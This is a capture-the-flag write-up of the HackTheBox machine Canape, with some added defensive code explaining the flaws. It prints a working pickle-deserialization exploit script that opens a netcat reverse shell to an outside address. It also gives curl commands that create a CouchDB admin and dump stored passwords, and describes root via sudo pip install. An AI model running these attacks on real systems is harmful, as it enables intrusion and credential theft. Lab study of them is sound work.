HackTheBox Writeup — Canape

Hello guys, I am Faisal Husaini and this is my first writeup on Medium, and also my first writeup on any platform on the web. My username on HTB is "faisalelino".

This writeup is on the Canape box, which is one of the hardest boxes on HTB. But the experience was great while solving this machine, as I learned about a lot of stuff along the way.

The IP for this machine is 10.10.10.70, so let's get started.

We see that port 80 is open, running Apache httpd 2.4.18. Also, if you notice in the results, we can see that there is a /.git directory on the web server; let's see what it contains.

So we access 10.10.10.70/.git in the browser, and we get:

http://10.10.10.70/.git

There is a directory listing, and also a "config" file in it; let's see what it contains.

http://10.10.10.70/.git/config

We see it has "url = http://git.canape.htb/simpsons.git", so let's clone the repository, but before that we have to add "canape.htb" and "git.canape.htb" to our hosts file like this:

Editing /etc/hosts

Now let's clone the repository from the URL we got:

git clone http://git.canape.htb/simpsons.git

We get the simpsons folder containing some files; let's look at the files in it.

cat __init__.py

We see it has an __init__.py file containing some code, but the main thing to point out is the cPickle module being imported, which means there might be a pickle injection (insecure deserialization) vulnerability; let's dig further.

Since we came to know that it might have a pickle injection vulnerability, I referred to a blog to learn more about it, as I was not very familiar with this vulnerability.
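As an added illustration (not code from the original writeup or from the box), the Python 3 snippet below shows what the cPickle import means in practice: any callable named by a pickled object's __reduce__ runs during loads, and the fix is a loader that never resolves globals at all, which still accepts the plain dict a quote submission needs. The Gadget, side_effect and executed names are constructed for this demo; the only thing it executes is a harmless list append.

```python
import io
import pickle

# Records anything that executes while a blob is being unpickled. In the box's
# __init__.py the equivalent of this list is "arbitrary commands as www-data".
executed = []

def side_effect(tag):
    executed.append(tag)
    return tag

class Gadget:
    # __reduce__ is the same hook an attacker-supplied pickle abuses with
    # os.system; here the callable is harmless so the block can run anywhere.
    def __reduce__(self):
        return (side_effect, ("ran during loads",))

class NoGlobalsUnpickler(pickle.Unpickler):
    # Hardened loader: a quote submission is plain dicts/lists/strings, which
    # pickle rebuilds without ever resolving a global, so refuse every lookup.
    def find_class(self, module, name):
        raise pickle.UnpicklingError("refusing to resolve %s.%s" % (module, name))

def unsafe_load(blob):
    return pickle.loads(blob)          # what cPickle.loads on user data does

def restricted_load(blob):
    return NoGlobalsUnpickler(io.BytesIO(blob)).load()

def demo():
    """Returns (unsafe loader ran the gadget, restricted loader blocked it,
    restricted loader's result for a benign constructed submission)."""
    gadget_blob = pickle.dumps(Gadget())                         # constructed payload
    benign_blob = pickle.dumps({"character": "homer", "quote": "D'oh!"})
    executed.clear()
    unsafe_load(gadget_blob)
    ran = executed == ["ran during loads"]
    executed.clear()
    try:
        restricted_load(gadget_blob)
        blocked = False
    except pickle.UnpicklingError:
        blocked = not executed
    return ran, blocked, restricted_load(benign_blob)

if __name__ == "__main__":
    print(demo())
```

Storing submissions as JSON instead of pickle removes the problem entirely; the restricted unpickler is the fallback when the format cannot be changed.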

We need to create a Python exploit script to trigger the vulnerability:

import os
import cPickle
from hashlib import md5
import requests

# Exploit that we want the target to unpickle

class Exploit(object):
    def __reduce__(self):
        return (os.system, ('homer;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.89 1234 >/tmp/f',))

shellcode = cPickle.dumps(Exploit())
print shellcode + "\n"
print md5(shellcode).hexdigest()

# Split the pickle on ";" so it can be sent through the two form fields of /submit
part1 = str(shellcode.split(";")[0])
part2 = str(";" + shellcode.split(";")[1])
part3 = str(";" + shellcode.split(";")[2])
part4 = str(";" + shellcode.split(";")[3])

r = requests.post("http://10.10.10.70/submit", data={'character': str(part1), 'quote': str(part2 + part3 + part4)})

print(r.status_code, r.reason, r.text)

# The submission is stored under the md5 of the pickle; /check loads it by id
r2 = requests.post("http://10.10.10.70/check", data={'id': md5(shellcode).hexdigest()})

print(r2.status_code, r2.reason, r2.text)

Please keep the indentation after the class and function definitions, as Medium does not support tabs.

After getting everything ready, we set up a netcat listener on port 1234, as that is the port I gave for the reverse connection in the python-exploit.py script. Now let's run the exploit.

Reverse Connection Through Python Pickle Injection

Cool! We got a reverse connection; now let's dig further.

As we have a shell, let's get a tty using python:

Getting tty

As we are www-data, we can't get access to the user "homer" on this box.

Let's run "ps aux | grep homer" and see what processes are running as the homer user:

ps aux | grep homer

We can see that it is running CouchDB, so let's search for CouchDB exploits or privilege escalation methods.

Here we use curl commands to create an admin user in the CouchDB database, and then use it to dump the usernames and passwords stored there:

curl -X PUT 'http://127.0.0.1:5984/_users/org.couchdb.user:faisal' --data-binary '{"type":"user","name":"faisal","roles":["_admin"],"roles":[],"password":"toor"}'

Creating our own user on the database
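The body sent above carries the "roles" key twice. As an added illustration (not part of the original writeup), this Python 3 snippet models how two JSON parsers can disagree on such a document, one keeping the first value and one the last, which is the parser mismatch the justi.cz reference below describes, and shows a strict loader that rejects duplicate keys outright. DOC is a constructed copy of the writeup's request body; the function names are my own.

```python
import json

# Constructed copy of the request body from the writeup: "roles" appears twice.
DOC = ('{"type":"user","name":"faisal","roles":["_admin"],"roles":[],'
       '"password":"toor"}')

def last_wins(text):
    # Python's json module (like JavaScript's JSON.parse) keeps the last value
    # for a repeated key, so this side sees an ordinary user with no roles.
    return json.loads(text)

def first_wins(text):
    # Model of a parser that keeps the first occurrence of a key, so this side
    # sees a member of _admin. When validation uses one parser and storage
    # uses the other, the role check is bypassed.
    def keep_first(pairs):
        out = {}
        for key, value in pairs:
            out.setdefault(key, value)
        return out
    return json.loads(text, object_pairs_hook=keep_first)

def strict_loads(text):
    # Hardened loader: a repeated key is an error, not a guess.
    def reject_dupes(pairs):
        keys = [key for key, _ in pairs]
        dupes = sorted({key for key in keys if keys.count(key) > 1})
        if dupes:
            raise ValueError("duplicate JSON keys: %s" % dupes)
        return dict(pairs)
    return json.loads(text, object_pairs_hook=reject_dupes)

def roles_seen(text=DOC):
    """Roles as seen by a last-wins parser and by a first-wins parser."""
    return last_wins(text)["roles"], first_wins(text)["roles"]

def is_rejected(text):
    """True when the strict loader refuses the document."""
    try:
        strict_loads(text)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print(roles_seen(), is_rejected(DOC))
```

A defender reviewing CouchDB access logs can apply the same check to PUT bodies on /_users: a document with a repeated "roles" key has no legitimate reason to exist.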

We have successfully created a user in the DB; to confirm, we use the command below:

curl -X GET 'http://faisal:toor@127.0.0.1:5984/_users/_all_docs'

Confirming the user created

Here we confirm that the user we created in the DB has been created successfully.

Now we dump the usernames and passwords from the DB using the command below:

curl -X GET 'http://faisal:toor@127.0.0.1:5984/passwords/_all_docs?include_docs=true'

Dumping the usernames and passwords

From the dumped data, we can see that there is a password for the user "homer", which is "h02ddjdj2k2k2".

Let's try to switch to that user with "su homer" and then provide the password:

su homer

It fails, hmmm. Also, only port 80 was open in the nmap scan we did... but the dump also has a password for ssh, i.e. "0B4jyA0xtytZi7esBNGp", with no user given.

Maybe it is the SSH password for the user "homer", but we saw no SSH port open in the normal nmap scan we did before, so let's try a full port scan using the command below:

nmap -sV -sC 10.10.10.70 -p- --min-rate 1000

NMAP Full Port Scan

We see that there is one more port open, i.e. 65535, which for me was a complete troll :P as I was hitting my head trying to get connected as the "homer" user.

Let's try connecting as the user "homer" through SSH.

We connect to SSH using the command below:

ssh homer@10.10.10.70 -p 65535

Password: 0B4jyA0xtytZi7esBNGp

SSH Connection Successful

Bingo! We got in. Let's now dig into it and get the user flag and the root flag (which still requires a full privilege escalation).

sudo -l

When we type the "sudo -l" command, we see that we can run /usr/bin/pip install * with sudo.

So let's exploit that. First we create a Python script so that we get a reverse shell back to us when pip installs it, after setting up a netcat listener to catch the reverse shell.

Python Script To Exploit /usr/bin/pip install * as sudo

Here is our code ready; now let's do the exploitation part.

We use the following command:

sudo /usr/bin/pip install . --upgrade --force-reinstall

We also set up an nc listener on our host machine.

Command + Listener

All set, now time to exploit.

Exploit Successful

Voila!! We got root; now time to get both of the flags!

The user flag is in the home directory of the user "homer":

user.txt

We got the user flag.

The root flag is under the /root directory:

root.txt

We got the root flag as well.

The vulnerabilities in the box are as follows:

1) Python pickle injection → RCE and a low-privilege shell as www-data
2) CouchDB → user privileges (homer) from www-data
3) sudo permitted for /usr/bin/pip install * → root access

References

Below are the links which helped me in solving the box:

https://blog.nelhage.com/2011/03/exploiting-pickle/

https://lincolnloop.com/blog/playing-pickle-security/

https://justi.cz/security/2017/11/14/couchdb-rce-npm.html

https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/

https://wiki.apache.org/couchdb/How_to_create_users_via_script

https://github.com/0x00-0x00/FakePip

Hacker | Bug Hunter | Python Coder | Gamer | Reverse Engineering Lover
